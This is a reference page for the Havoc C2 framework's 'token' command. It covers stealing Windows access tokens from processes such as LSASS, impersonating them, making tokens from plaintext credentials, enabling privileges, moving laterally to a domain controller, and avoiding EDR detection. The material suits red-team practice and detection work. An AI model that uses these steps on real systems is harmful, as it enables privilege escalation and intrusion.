Documentation Index
Fetch the complete documentation index at: https://mintlify.com/HavocFramework/Havoc/llms.txt
Use this file to discover all available pages before exploring further.
Overview
The token command implements a comprehensive token management system that allows operators to steal, store, impersonate, and create Windows access tokens. All stolen tokens are preserved in a token vault for later use.
Token Vault
Tokens are duplicated with SecurityIdentification and SecurityImpersonate privileges, allowing OpenThreadToken to work on impersonated UIDs with OpenAsSelf set to TRUE.
Syntax
token [subcommand] [parameters]
Subcommands
getuid
Display the current user context from the active token.
Current user in DOMAIN\username format
Security Identifier (SID) of the current user
Token type: Primary or Impersonation
list
Display all tokens currently stored in the token vault.
Vault ID for the token (used for impersonation)
User associated with the token
Token type (Primary or Impersonation)
Impersonation level (SecurityAnonymous, SecurityIdentification, SecurityImpersonation, SecurityDelegation)
find-tokens
Enumerate all accessible tokens on the system that can be stolen.
Scans running processes and identifies tokens that can be duplicated.
Process ID containing the token
User context of the token
steal
Steal a token from a specified process and add it to the vault.
token steal [pid] [handle]
Process identifier to steal token from
Specific token handle to duplicate (optional, defaults to primary token)
impersonate
Impersonate a token from the vault.
Token vault ID (from token list)
make
Create a new token from credentials and add it to the vault.
token make [domain] [username] [password] [logon_type]
Domain name or computer name for local accounts
Username for authentication
Password for authentication
Windows logon type:
2 - Interactive (LOGON32_LOGON_INTERACTIVE)3 - Network (LOGON32_LOGON_NETWORK)4 - Batch (LOGON32_LOGON_BATCH)5 - Service (LOGON32_LOGON_SERVICE)9 - NewCredentials (LOGON32_LOGON_NEW_CREDENTIALS) - Default
privs-get
Attempt to enable all privileges on the current token.
Attempts to enable:
- SeDebugPrivilege
- SeImpersonatePrivilege
- SeTcbPrivilege
- And all other available privileges
privs-list
List all privileges and their status for the current token.
Privilege name (e.g., SeDebugPrivilege)
Human-readable description of the privilege
revert
Revert to the original process token.
Stops impersonating any token and returns to the default process token.
remove
Remove a token from the vault.
clear
Remove all tokens from the vault.
Clears the entire token vault and reverts to the original process token.
Examples
Basic Token Theft and Impersonation
# Find available tokens
token find-tokens
# Steal token from LSASS (PID 644)
token steal 644
# List vault to get token ID
token list
# Impersonate the stolen token (ID 1)
token impersonate 1
# Verify current context
token getuid
Create Token from Credentials
# Create token for domain admin
token make CORP admin Password123! 9
# List tokens to get ID
token list
# Impersonate the new token
token impersonate 2
Privilege Escalation
# Check current privileges
token privs-list
# Enable all available privileges
token privs-get
# Verify privileges are enabled
token privs-list
Multiple Token Management
# Steal multiple tokens
token steal 644 # SYSTEM from lsass
token steal 1520 # User from explorer
token steal 2048 # Admin from services
# List all tokens
token list
# Switch between contexts
token impersonate 1 # SYSTEM
token getuid
token impersonate 3 # Admin
token getuid
# Revert to original
token revert
token getuid
Cleanup
# Remove specific token
token remove 2
# Or clear all tokens
token clear
OPSEC Considerations
Token operations can generate significant security events and may be monitored by EDR solutions.
Token Theft Detection
- Opening process handles (especially to LSASS) triggers monitoring
OpenProcessToken and DuplicateTokenEx are commonly hooked- Consider using indirect syscalls for token operations
- Avoid repeatedly accessing sensitive processes
Impersonation Detection
- Thread token changes may be logged by security products
- Some actions while impersonating generate events with the impersonated user
- Network authentication will use the impersonated context
Best Practices
- Selective Theft: Only steal tokens you need
- Clean Up: Remove tokens from vault when done
- Verification: Always verify context with
token getuid after impersonation
- Revert: Use
token revert when impersonation is no longer needed
- Privilege Management: Only enable required privileges, not all
Use Cases
Lateral Movement
# Steal domain admin token
token find-tokens
token steal 2048
token impersonate 1
# Access remote system with elevated context
fs dir \\DC01\C$
Privilege Escalation
# Steal SYSTEM token from winlogon or lsass
proc grep winlogon
token steal 644
token impersonate 1
# Enable debug privilege
token privs-get
Credential-Based Access
# Create token from plaintext credentials
token make CORP administrator Password123! 9
token impersonate 1
# Access resources as that user
net dclist CORP
Token Types
Primary Token
Impersonation Token
Represents the security context of a process.
- Associated with processes
- Contains user SID, groups, privileges
- Used for process-level access checks
Allows a thread to execute in a different security context.
- Associated with threads
- Has impersonation levels (Anonymous, Identification, Impersonation, Delegation)
- Used by Demon for context switching
Impersonation Levels
- SecurityAnonymous (0): Server cannot impersonate or identify client
- SecurityIdentification (1): Server can obtain identity and privileges but cannot impersonate
- SecurityImpersonation (2): Server can impersonate client’s security context on local system
- SecurityDelegation (3): Server can impersonate client’s security context on remote systems
Notes
- Token vault is maintained per-agent session
- Tokens do not persist across agent restarts
- Impersonation affects the current thread only
- Network operations use the impersonated token automatically
- Some operations require specific privileges (e.g.,
SeDebugPrivilege for stealing from protected processes)
- Delegation-level tokens are rare and valuable for remote access
